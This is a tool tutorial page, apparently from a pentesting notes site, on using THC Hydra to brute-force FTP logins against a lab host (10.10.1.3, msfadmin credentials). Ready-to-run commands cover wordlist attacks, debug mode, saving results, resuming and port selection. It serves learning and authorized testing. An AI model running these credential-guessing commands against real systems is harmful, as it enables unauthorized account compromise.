๐Ÿšˆhydra

THC Hydra stands for โ€œThe hackers choiceโ€ Hydra.

Step 1: To crack the Password for SSH and FTP service, type the below command - Password Cracking Using seclists Username and password

Useful commands in hydra tool

  1. -R: restore a previous aborted/crashed session

  2. -S: perform an SSL connect

  3. -s: PORT if the service is on a different default port, define it here

  4. -l LOGIN or -L: FILE login with LOGIN name, or load several logins from FILE

  5. -p PASS or -P: FILE try password PASS, or load several passwords from FILE

  6. -o FILE : write found login/password pairs to FILE instead of stdout

  7. -4 / -6 : prefer IPv4 (default) or IPv6 addresses

#hydra -h - to view the hydra commands and help

Type the below command for FTP Password Crack

hydra -L /usr/share/seclists/Usernames/top-usernames-shortlist.txt -P /usr/share/seclists/Passwords/500-worst-passwords.txt 10.10.1.3 ftp

-L - List of User file location

-l - user name

-P - List of Password file Location

-p - password

specify the host and service name

1.Using specific username and password

Use the below command to crack the password

hydra -l msfadmin -p msfadmin 10.10.1.3 ftp

-l - Specific user name

-p - specific password

2.Using multiple username and password

To use multiple usernames and password list just enter capital -L and -P

hydra -L /home/protector/Downloads/username\ (copy).txt -P /home/protector/Downloads/userpass\ (another\ copy).txt 10.10.1.3 ftp -v

-L : Specify the User name list file location

-P : Specify the password list file location

3.Using debug mode in hydra

The debug mode gives you more clarification on what is happening.

hydra -L /home/protector/Downloads/username\ (copy).txt -P /home/protector/Downloads/userpass\ (another\ copy).txt 10.10.1.3 ftp -v -d

4.Save the result

To save the result you can use the -o parameter

hydra -L /home/protector/Downloads/username\ (copy).txt -P /home/protector/Downloads/userpass\ (another\ copy).txt 10.10.1.3 ftp -o ftphack.txt

cat ftphack.txt

5.Resume attack

To resume the session if the existing session disconnected

hydra -L /home/protector/Downloads/username\ (copy).txt -P /home/protector/Downloads/userpass\ (another\ copy).txt 10.10.1.3 ftp

hydra -R

6.Attacking on specific port

To attack on specific port enter the -s Parameter, Instead of entering service you can specify the port and attack.

hydra -L /home/protector/Downloads/username\ (copy).txt -P /home/protector/Downloads/userpass\ (another\ copy).txt 10.10.1.3 ftp -s 21

PreviousMedusaNextncrack

Last updated

Was this helpful?